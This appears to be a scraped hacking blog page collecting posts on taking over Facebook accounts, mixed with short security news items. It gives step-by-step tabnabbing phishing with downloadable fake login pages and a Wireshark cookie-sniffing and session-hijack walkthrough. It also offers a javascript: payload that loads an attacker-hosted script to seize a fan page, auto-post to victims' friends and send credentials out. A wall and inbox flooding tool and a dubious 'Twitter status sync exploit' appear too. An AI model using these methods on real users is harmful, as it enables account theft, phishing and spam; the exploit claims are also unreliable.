How To Hack FaceBook Account Using A Web Based Exploit

For security reasons the databases are programmed to verify the account your requesting is actually yours and not someone elses so they need some type of authentication or verification (thats why they send you averification link to your email when creating your account or changing your password).

Luckily for us, as mentioned above, through the use of Twitter combined with Facebooks ‘Mutual Friend’ feature, we can use a friends account to verify your own, in other words, if the person you want to get the login information from is on your friends list on Facebook…you can use your Twitter account to verify your their friend on Facebook taking advantage of the vulnerability of the twitter status sync exploit, and get their login email and password sent to you. But the victim must be on your friends list on Facebook.
HOW TO DO IT (more…)

All in One Phisher Fake Page Creator Best Tools For Phisher Maker Download +Tutorial

This is Very Great Tool For Great Phisher:
Download file Size: 9 MB
Download

Skype 5 Client – Remote Session Hijacking Through Facebook Bridge

Skype’s integration with Facebook is being touted as “the best of both worlds” but the new Skype 5.5 for Windows update contains a highly-critical security flaw that allows Skype session hijacks or even full system compromise.

According to an advisory posted at secalert.net, an attacker can exploit a system even it the victim is not a Facebook friend or a Skype contact.

Details on the vulnerability are being kept under wraps but The H security says they were able to reproduce the issue. The Skype security blog has not yet acknowledged the flaw.

A video demo is available:

Faceniff An Evil Android Application

What is Faceniff?

FaceNiff is an Android application that lets users sniff and intercept web session profiles over Wi-Fi networks, stealing other user’s credentials from Facebook, Twitter and onther services.
The app requires root access on the user’s Android smartphone, but other than that it’s fairly simple to use, which makes it perhaps even more dangerous than Firesheep and Twitter sessions over Wi-Fi networks. FaceNiff also works on WPA-encrypted Wi-Fi networks, which Firesheep doesn’t support.

Right now it works with Facebook, Twitter, Youtube, and Nasza-klasa (a Polish Facebook clone), but developer Bartosz Ponurkiewicz promises more are coming.

FaceNiff is much more flexible than Firesheep as the latter requires a computer. Nearly anything is accessible to FaceNiff users, providing they can get access to protected networks.

Here is the video of faceniff demonstrating the new attack.

How to protect yourself from FaceNiff?

FaceNiff cannot, however, access accounts that use https browsing, which encrypts information for a more secure browsing session. Facebook is not automatically on https. Users must enable it manually, and Twitter also requires users to manually activate it. Perhaps with the wider availability of an app like FaceNiff, https browsing will become standard.

Download FaceNiff from here: Download

Facebook Password Reset Coming to Phone Near You

Facebook said it plans to add a new security feature that allow mobile device users to reset their passwords so they can regain access to their accounts.

Mobile password reset, which was announced Monday, will give mobile users the ability to identify their accounts and choose which email addresses should receive recovery links. It will also offer additonal ways for users to confirm their identity that weren’t elaborated in the blog post.

“If you ever forget your password or get locked out of your account, we want to make it easy to het back on Facebook,” Dan Muriello, an engineer on Facebook’s integrity team, wrote. “We are testing the ability to reset your password from your mobile device.”

Facebook engineers plan to roll out the reset feature “slowly” so they can gather feedback as they go.

The ability to reset passwords from mobile phones builds on previous security enhancements offered by the social network. The site can now send mails or SMS messages each time a user’s account is accessed on a new computer. It also filters sites known to be malicious and offers protections against some clickjacking attacks.

Google, meanwhile, has offered a more robust set of security protections, including two-factor authentication using mobile phones, and a list of recent IP addresses that have been used to access an account.

The password reset feature was announced in the same post that outlined a new social-reporting feature also being rolled out to mobile users.

HOW TO HACK A FACEBOOK ACCOUNT USING TABNABBING

Requirements:

1. Phishing Pages by Hacking Loops: Click here to download

2. Register on my3gb website and upload these to them.

3. Send the link to victim.

How to hack Facebook account password using Tabnabbing:

I have explained this hack with complete video from very start till the end we receives the hacked passwords.

This technique hardly requires less than 5 minutes to hack the Facebook account password not like the last Facebook hack which requires 24hrs for approval. This is the first version of this hack. I will tell you the improvement in this technique in further tutorials. So watch the video and Enjoy it. The only thing i not included in this video is How to send Phishing emails. You all know the reason for this, we cannot discuss such things directly on internet because that can be misused by newbies and i don’t want that anybody should use my tutorials for wrong way. I make videos just to guide you how hackers do the things. My intention is to guide you latest things happening in security field and not to make you a cracker.

So Enjoy the Video and learn how tabnabbing is done…

I hope you all enjoyed it… For getting mail related things post your email address below.. Only Subscribers will get the Email matter…That email matter consists of html email that you have to sent to victim to hack his account…

DOWNLOAD FREE FACEBOOK BLACK BOX

 
Features:

•  Wall Flooder – Floods the wall of your victim
•  Inbox Flooder – Floods the inbox of your victim
•  Status Flooder – Floods with your status message
•  Comment Spammer – Spam comments of a random link
•  Mass Likes – Likes all the posts of your victim
•  Random Friend Adder – 
• Poke – Pokes your victim (once)
• User ID Checker

How to use:

•  Please update your .NET Framework to the latest version!
•  Before you log in your account, make sure it isn’t logged in to another browser.
•  If you can’t log in, clear the cache of your IE.
•  Compatibility with Windows XP, Vista, or Windows 7

To download click on the link :-

http://www.megaupload.com/?d=EMHKONB7

Thanks….

FACEBOOK COOKIE STEALING & SESSION HIJACKING – HACK FACEBOOK ACCOUNTS

The cookie which facebook uses to authenticate it’s users is called “Datr”, If an attacker can get hold of your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain access to your account. This is how a facebook authentication cookielooks like:

Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc;

How To Steal Facebook Session Cookies And Hijack An Account? 

An attacker can use variety of methods in order to steal your facebook authentication cookies depending upon the network he is on, If an attacker is on a hub based network he would just sniff traffic with any packet sniffer and gain access to victims account.

If an attacker is on a Switch based network he would use an ARP Poisoning request to capture authentication cookies, If an attacker is on a wireless network he just needs to use a simple tool called firesheep in order to capture authentication cookie and gain access to victims account.

In the example below I will be explaining how an attacker can capture your authentication cookies and hack your facebook account with wireshark.

Step 1 – First of all download wireshark from the official website and install it.

Step 2 – Next open up wireshark click on analyze and then click on interfaces.

Step 3 – Next choose the appropriate interface and click on start.



Step 4 – Continue sniffing for around 10 minutes.

Step 5 – After 10minutes stop the packet sniffing by going to the capture menu and clicking on Stop.

Step 6 – Next set the filter to http.cookie contains “datr” at top left, This filter will search for all the http cookies with the name datr, And datr as we know is the name of the facebookauthentication cookie.

Step 7 –  Next right click on it and goto Copy – Bytes – Printable Text only.

Step 8 – Next you’ll want to open up firefox. You’ll need both Greasemonkey and thecookieinjector script. Now open up Facebook.com and make sure that you are not logged in.

Step 9- Press Alt C to bring up the cookie injector, Simply paste in the cookie value into it.

Step 10 – Now refresh your page and viola you are logged in to the victims facebook account.

Note: This Attack will only work if victim is on a http:// connection and even on https:// if end to end encryption is not enabled.

Countermeasures

The best way to protect yourself against a session hijacking attack is to use https:// connection each and every time you login to your Facebook, Gmail, Hotmail or any other email account. As your cookies would be encrypted so even if an attacker manages to capture your session cookies he won’t be able to do any thing with your cookies. 

FACEBOOK UNFRIEND FINDER – FIND THE ONE WHO UNFRIENDS YOU

This app works perfectly in chrome ,safari,mozilla tested by me.
We have lot of buddies in our facebook friends’ list, some we know very well, some who are acquaintance but there are occasions when someone removes us from their friends’ list. Facebook don’t have any provision of displaying any notification or any other mean, to let us know when someone removes us or unfriends us from their friend list.

In case you are wondering what Unfriends mean, these are the people who either have removed us from their friend list or have deactivated their account on Facebook. While Facebook never show you who all unfriended you, this is still possible with the use some third party apps like this one called Unfriend Finder.

                              

Unfriend Finder is a script that works real time to let you know who all have removed you from their friend list. This script compares your buddies with the database maintained and refreshed over the time, so as to find any discrepancy and report it to you. Unfriend Finder will tell you which friends have removed you, who have deactivated their accounts, people you have requested friendship with and who has declined your friend request.

The app let you know the event, by showing a red symbol in the menu bar along with the standard Facebook notification. To be able to use this, you need to install the “Greasemonkey” (only in case of Firefox users, other browser users bypass this step) andinstall the script.

Install Greasemonkey
Install Unfriend Finder

HOW TO HACK A FACEBOOK FAN PAGE

First of all we will need to setup an exploit and a website to host the exploit. If you already have a hosting then its great otherwise there are couple of free hosting websites that can be used for such purposes. I will tell you about it along with the tutorial.
Disclaimer: Coder and related sites are not responsible for any abuse done using this trick.

1. Download the exploit from this Link.

http://www.easy-share.com/1913947632/HackPages%20At%20facebook.rar

2. After downloading it, you need to edit the it. Get notepad++, one of my hot favorite editor. You can download it from here. http://notepad-plus-plus.org/download

3. Open the file named pagehack.js with notepad++. Now find the text wamiqali@hungry-hackers.com by pressing ctrl+f and replace it with your own email id which you have used while signing up for facebook.

4. Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text Hey See what i got! and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15. Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js)

5. Now you have to upload this script to your server. For this make an account at 0fess.net or 000webhost.com (t35 or 110mb won’t help this time) and use filezilla and upload this to your root. So the address where your script is uploaded will be as follows:

www.yoursite.0fess.net/booster.js

6. Now comes the most important part of this Hack. You need to convince the admin of that Fan page to put the following code (Note: Don’t forget to replace the text in bold with the address of your script) in his browser’s address bar and hit enter while he is on Facebook.

javascript:(a = (b = document).createElement(“script”)).src = “//www.yoursite.0fess.net/booster.js“, b.body.appendChild(a); void(0)